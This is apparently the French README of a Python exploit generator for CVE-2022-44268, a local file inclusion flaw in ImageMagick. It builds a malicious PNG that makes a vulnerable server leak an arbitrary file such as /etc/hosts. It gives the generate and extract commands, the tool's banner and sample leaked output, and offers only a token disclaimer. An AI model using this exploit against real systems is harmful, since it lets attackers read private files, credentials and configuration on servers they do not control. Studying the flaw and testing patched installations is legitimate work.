
Générateur d'exploit Python pour la vulnérabilité CVE-2022-44268 d'inclusion de fichiers locaux dans ImageMagick. Crée des fichiers PNG malveillants pour lire des fichiers arbitraires sur les systèmes vulnérables.
ImageMagick est une suite logicielle multiplateforme gratuite et open-source permettant d'afficher, convertir et éditer des images matricielles et vectorielles. Il peut lire et écrire plus de 200 formats de fichiers image. ImageMagick est sous licence Apache 2.0. Il est disponible sous forme d'outils en ligne de commande, ainsi que d'une API C et d'un ensemble de classes C++. Wikipédia
ImageMagick versions 7.1.0-40 et antérieures sont vulnérables à une inclusion locale de fichier (Local File Inclusion). La vulnérabilité est due à une validation incorrecte des entrées fournies par l'utilisateur. Un attaquant peut exploiter cette vulnérabilité en envoyant un fichier PNG spécialement conçu vers la cible. Une exploitation réussie pourrait permettre à un attaquant de lire des fichiers arbitraires sur le système cible.
Crédits aux chercheurs qui ont découvert cela :
Créer un PNG malveillant pour exploiter ImageMagick 7.1.0-40 :
pip install Pillow)Fabrication d'un PNG avec generate.py :
python3 generate.py -i input.png -f "/etc/hosts" -o exploit.png
______ __ _____ ______
| _ \ \ / / | __ \ | ____|
| |_) \ \_/ / | |__) |__ __ _ ______| |__ _ __ ___ __ _
| _ < \ / | ___/ _ \ / _` |______| __| '__/ _ \ / _` |
| |_) | | | | | | (_) | (_| | | | | | | (_) | (_| |
|____/ |_| |_| \___/ \__, | |_| |_| \___/ \__, |
__/ | __/ |
|___/ |___/
[*] ImageMagick LFI Exploit
[*] Embedding Payload to read the target file
[*] Exploit PNG generated: exploit.png
python3 extract.py downloaded_img.png
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Avertissement : Sois gentil, s'il te plaît, ne l'utilise pas pour de mauvaises actions.